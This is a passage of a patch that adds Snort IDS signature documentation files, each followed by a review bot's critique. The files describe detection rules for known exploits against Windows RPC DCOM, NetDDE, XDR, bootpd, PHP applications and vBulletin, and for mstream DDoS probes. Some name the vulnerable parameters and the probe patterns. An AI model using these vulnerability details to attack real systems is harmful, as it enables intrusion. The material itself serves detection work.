+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
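Review bot: Additional References is empty; the Microsoft security bulletin for this License Logging Service issue should be cited, as 2931.txt does for NetDDE, since Corrective Action is only "Apply the appropriate vendor supplied patches" and the reader has nothing to look up. Affected Systems lists "Microsoft Windows Server 2000", which is not a product name (the product is Windows 2000 Server). Layout: a stray blank line sits between "--" and "Corrective Action:", and several header lines ("Rule: ", "Sid: ", "-- ") carry trailing whitespace.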
--- /dev/null
+++ b/doc/signatures/3390.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3390
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
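Review bot: This text is repeated verbatim in 3425.txt and 3334.txt in this patch, with only the Sid changed, so nothing tells the analyst what distinguishes the three rules (which RPC request or transport each one matches). Document the specific match for each, and cite the Microsoft bulletin under Additional References, which is empty. Also: Attack Scenarios ("a request for a file with an overly long filename via a network share") and Detailed Information ("malformed data via RPC") should be reconciled so the reader can see how the two descriptions relate; "Expoit" should be "Exploit"; and "ports 135, 139 and 445 for both TCP and UDP" is imprecise, since 139 is a TCP NetBIOS session port.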
--- /dev/null
+++ b/doc/signatures/2931.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
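Review bot: Detailed Information says the buffer is overflowed "by using a specially crafted NetDDE message" but never says which part of the message the rule inspects, so the analyst cannot judge a hit; state the matched field or length. The note that the service "is not started by default" is a useful caveat and should be echoed under False Positives or False Negatives (a hit against a host with NetDDE stopped is an attempt, not a compromise). Punctuation: the Impact line and "Apply the appropriate vendor supplied patches" lack a terminating period.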
--- /dev/null
+++ b/doc/signatures/392.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+392
+
+--
+
+Summary:
+This event is generated when an ICMP Datagram Conversion Error message is detected on the network.  ICMP Datagram Conversion Error messages were developed with the introduction of IPv6 to give information about invalid datagram conversions between IPv4 and IPv6.
+
+--
+
+Impact:
+No known attack vectors are known that use ICMP type 31 datagrams.  This is purely an informational message that detects errors on the network.
+
+--
+
+Detailed Information:
+ICMP Type 31 was developed to return information about datagram conversion errors between IPv4 and IPv6 as data is converted between them.  
+
+--
+
+Attack Scenarios:
+None known
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Datagram Conversion Error messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 31 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
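Review bot: Summary claims ICMP Datagram Conversion Error messages "were developed with the introduction of IPv6", but Additional References is "None", so the claim is unsupported; cite the RFC that defines ICMP type 31 or drop the attribution. Impact's "No known attack vectors are known" is redundant ("No attack vectors are known"). Attack Scenarios ("None known") and Ease of Attack ("Numerous tools and scripts can generate...") pull in different directions; say that the messages are trivial to forge but that no attack is known to use them. Layout: this hunk puts a blank line after every "--", unlike the rest of the patch, and Attack Scenarios lacks the blank line before its "--".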
--- /dev/null
+++ b/doc/signatures/2092.txt
@@ -0,0 +1,86 @@
+Rule:
+
+--
+Sid:
+2092
+
+--
+Summary:
+vulnerability in xdrmem_getbytes used by XDR in RPC portmap services.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdrmem_getbytes) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request can lead to remote system compromise and
+super user access to the target host. Additionally, a denial of service 
+and execution of arbitrary code with the privilege of the super user is 
+also possible.
+
+--
+Affected Systems:
+Multiple vendors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request to the target
+host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7123
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0028
+
+CERT:
+http://www.cert.org/advisories/CA-2003-10.html
+http://www.kb.cert.org/vuls/id/516825
+http://www.kb.cert.org/vuls/id/192995
+
+--
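Review bot: Summary is a sentence fragment ("vulnerability in xdrmem_getbytes used by XDR in RPC portmap services.") whose opening has been lost; restore it to the template form, "This event is generated when an attempt is made to exploit a known vulnerability in xdrmem_getbytes...". Also "rpc request" should be "RPC request" (twice) for consistency with the rest of the file, and "Simple" and "None Known" lack the terminating period used elsewhere. The Corrective Action note that statically linked binaries must be recompiled is the right caveat for a library fix and should stay.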
--- /dev/null
+++ b/doc/signatures/100000443.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000443
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "galimage.lib.php" using a remote file being passed as the "listconfigfile[0]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "listconfigfile[0]" parameter in the "galimage.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
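Review bot: Same template problems as 100000478.txt in this patch: Attack Scenarios and the last paragraph of Detailed Information are the generic CGI "credentials" boilerplate that does not describe a remote file include through "listconfigfile[0]" in "galimage.lib.php"; "an exploitation attempt has been attempted" is redundant; "running ona web server" should be "on a"; Affected Systems should list MiraksGalerie versions; and the file starts with two blank lines, omits the blank line before "--" after Sid, Affected Systems and Contributors, and leaves its paragraphs unwrapped where every other file wraps at about 72 columns.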
--- /dev/null
+++ b/doc/signatures/1736.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1736
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
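Review bot: This file is identical to 1968.txt and 1742.txt in this patch apart from the Sid; the application, script and parameter that distinguish this rule are not named anywhere, so the document adds nothing to the Sid. Fill in Summary and Detailed Information with the specific match. Typos as in the sibling files: "ona web server" should be "on a", and "attackers choosing" needs the possessive apostrophe.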
--- /dev/null
+++ b/doc/signatures/1906.txt
@@ -0,0 +1,68 @@
+Rule:
+--
+Sid:
+1906
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) amd service.
+
+--
+Impact:
+Remote root access. This attack can permit execution of arbitrary
+commands with the privileges of the user running amd, typically root.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts. The
+amd service automatically mounts and unmounts requested file systems.
+There is a buffer overflow associated with amd logging that can allow
+execution of arbitrary commands with the privileges of the user running
+amd, typically root.
+
+--
+Affected Systems:
+	BSDI BSD/OS 3.1, 4.0.1
+	FreeBSD 3.0, 3.1, 3.2
+	Red Hat Linux 4.2, 5.0, 5.1, 5.2, 6.0
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where amd runs
+and then attack the amd port. Alternatively, an attacker may attempt to
+execute the exploit code on any listening port in the RPC range if the
+portmapper is blocked. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
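Review bot: "Rule:" is not followed by the blank line the template uses before "--". Corrective Action's second item is garbled: "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads as denying access to the machines themselves; it should say that access to the RPC ports of those machines is denied from outside the network. Additional References is empty although Detailed Information describes a specific amd logging overflow; cite the advisory. "None Known." should be "None known." (twice) and "Simple.  Exploit code" has a double space.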
--- /dev/null
+++ b/doc/signatures/1742.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1742
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
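Review bot: This file repeats 1968.txt and 1736.txt word for word apart from the Sid, so an analyst reading it learns nothing about which PHP application, script or parameter this particular rule matches; fill in Summary and Detailed Information with the specific request, as 100000478.txt does. Typos carried over from the template: "ona web server" should be "on a", and "attackers choosing" needs the possessive apostrophe.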
--- /dev/null
+++ b/doc/signatures/3425.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3425
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
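Review bot: Identical to 3390.txt and 3334.txt in this patch apart from the Sid; state what this rule matches that the others do not (request, interface or transport), otherwise three Sids map to one indistinguishable description. Same fixes as the sibling file: "Expoit" should be "Exploit", reconcile the "overly long filename via a network share" scenario with the "malformed data via RPC" description, cite the Microsoft bulletin under the empty Additional References, and note that port 139 is TCP only when advising blocks for "both TCP and UDP".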
--- /dev/null
+++ b/doc/signatures/2292.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2292
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
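Review bot: Attack Scenarios is the generic PHP "authentication mechanism" boilerplate and does not match Detailed Information, which describes unvalidated user input leading to PHP code execution and file inclusion in Advanced Poll 2.0.2; the scenario should describe that input path instead. Detailed Information's second sentence is a comma splice ("...when handling user input, this may lead to..."); split it. Additional References is empty although a specific product and version are named; cite the vendor advisory or bug entry. "php files" should be "PHP files" for consistency.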
--- /dev/null
+++ b/doc/signatures/100000117.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+100000117
+
+-- 
+Summary: 
+This event is generated when an attempt is made to execute arbitrary commands 
+on a web server via the VBulliten system.
+
+-- 
+
+Impact: 
+Attackers may execute arbitrary code of their choosing with the privileges of 
+the affected script.
+
+--
+Detailed Information:
+The "comma" parameter of VBulliten's "forumdisplay.php" script is not 
+sufficiently santitized, and will allow users to run arbitrary commands with 
+the privileges of the affected script on the host system when the 
+"showforumusers" option has been enabled by the system administrator.
+
+--
+Affected Systems:
+VBulletin 3.0
+VBulletin 3.0 Beta 2
+VBulletin 3.0 Beta 3
+VBulletin 3.0 Beta 4
+VBulletin 3.0 Beta 5
+VBulletin 3.0 Beta 6
+VBulletin 3.0 Beta 7
+VBulletin 3.0 Gamma
+VBulletin 3.0.1
+VBulletin 3.0.2
+VBulletin 3.0.3
+VBulletin 3.0.4
+
+--
+
+Attack Scenarios: 
+A web browser or an automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+It has been reported that VBulliten versions 3.0.5 and above are not 
+vulnerable. Additionally, administrators may disable the "showforumusers" 
+configuration option as a workaround.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.vbulletin.com/
+
+--
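Review bot: The product name is misspelled "VBulliten" in Summary, Detailed Information and Corrective Action while Affected Systems spells it "VBulletin"; use one spelling throughout, and fix "santitized" in Detailed Information. Additional References carries only the vendor home page although Ease of Attack states "Simple, as public exploits exist"; add the vendor advisory and the CVE or Bugtraq identifier for the forumdisplay.php "comma" issue so that claim and the 3.0.5 fixed version in Corrective Action can be verified.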
--- /dev/null
+++ b/doc/signatures/245.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+245
+
+--
+Summary:
+This event is generated when an mstream handler attempts to identify active agents.
+
+--
+Impact:
+Severe. If the listed source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can probe to see if an agent is active by sending it a UDP packet to destination port 10498 with a string of "ping" in the payload. 
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+A mstream handler may probe to see if an agent is active.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known handler-to-agent ports in addition to  10498.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
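Review bot: False Negatives says "There are other known handler-to-agent ports in addition to  10498" but names none, so an analyst cannot tell what this rule misses or which sids cover the rest; list the ports or the sids. Minor: Attack Scenarios reads "A mstream handler" where Summary uses "an mstream handler", and the same line carries a double space.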
--- /dev/null
+++ b/doc/signatures/3334.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3334
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
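Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share") does not connect to the RPC DCOM overflow described in Detailed Information, which speaks of "a malformed request to an RPC port"; either explain how that filename reaches the DCOM interface over RPC or describe the malformed RPC request instead. Fix "Expoit" in Ease of Attack. Additional References is empty even though Corrective Action says "Apply the appropriate vendor supplied patches" and names ports 135, 139 and 445; cite the Microsoft bulletin and CVE entry that define that patch and port list.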
--- /dev/null
+++ b/doc/signatures/1171.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+Sid:
+1171
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an
+IDS in a possible web attack by sending an obfuscated request 
+using HEAD.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some CGI attacks can be accomplished by using HEAD instead of GET.
+This method can be used by an attacker to obfuscate attacks or
+reconnaissance in an attempt to evade IDS systems.
+
+--
+Affected Systems:
+	All systems running a web server.
+ 
+--
+Attack Scenarios:
+An attacker runs an automated tool, like Whisker, or sends a hand-crafted
+attack to a web server
+
+--
+Ease of Attack:
+Simple. Automated tools are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine what kind of attack or probe was launched.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
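Review bot: The header is missing the "--" separator between "Rule:" and "Sid:" that every other file uses, which will break anything that splits these documents on "--". "Impact: Unknown." beside "False Positives: None Known" is a weak pairing: HEAD is a legitimate method used by monitoring and link-checking tools, so either narrow Summary and Detailed Information to the obfuscation pattern the rule actually matches or record that benign HEAD traffic can trigger it. Fix "unkown" in Contributors.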
--- /dev/null
+++ b/doc/signatures/2054.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2054
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugzilla database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
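Review bot: Summary calls this "some degree of account hijacking" but Detailed Information and Impact describe comment spoofing, i.e. posting comments under another user's name; align Summary with the actual effect so the severity is not overstated. Affected Systems gives the CVS cutoff as "2.15 (cvs20020103)" while Detailed Information says "cvs version 2.15 prior to 20020103"; use one form in both places.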
--- /dev/null
+++ b/doc/signatures/319.txt
@@ -0,0 +1,64 @@
+SID:
+319
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a vulnerable 
+version of bootpd
+--
+
+Impact:
+If attack is successful, total system compromise from a remote attacker
+--
+
+Detailed Information:
+Due to improper handling of bounds checking in bootp request packets 
+Bootpd version 2.4.3(and earlier) is susceptible to several types of 
+buffer overflows. A successful exploit will result in complete 
+compromise of the attacked system. Any system running Bootpd version 
+Stanford University bootpd 2.4.3 should consider themselves vulnerable
+--
+
+Affected Systems:
+	Debian Linux 1.1 
+	Debian Linux 1.2 
+	Debian Linux 1.3 
+	Debian Linux 1.3.1 
+	Debian Linux 2.0 
+	Stanford University bootpd 2.4.3
+--
+
+Attack Scenarios:
+An attacker can exploit vulnerable bootpd servers and modify system 
+files as the root user or create a shell with root privileges
+--
+
+Ease of Attack:
+Simple, Sample code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have supplied patched versions of bootpd, upgrade
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
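Review bot: This file departs from the layout of the other signature docs: "SID:" precedes "Rule:", the "--" separators sit after each heading's body rather than before the next heading as elsewhere, and the final heading is "References:" instead of "Additional References:", so a parser keyed on section names will miss it. "Any system running Bootpd version Stanford University bootpd 2.4.3 should consider themselves vulnerable" is ungrammatical and only repeats Affected Systems; drop it or rewrite it. References is empty although Ease of Attack says "Sample code exists"; cite the advisory or CVE entry for the bootpd overflows.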
--- /dev/null
+++ b/doc/signatures/111-2.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+111-2
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
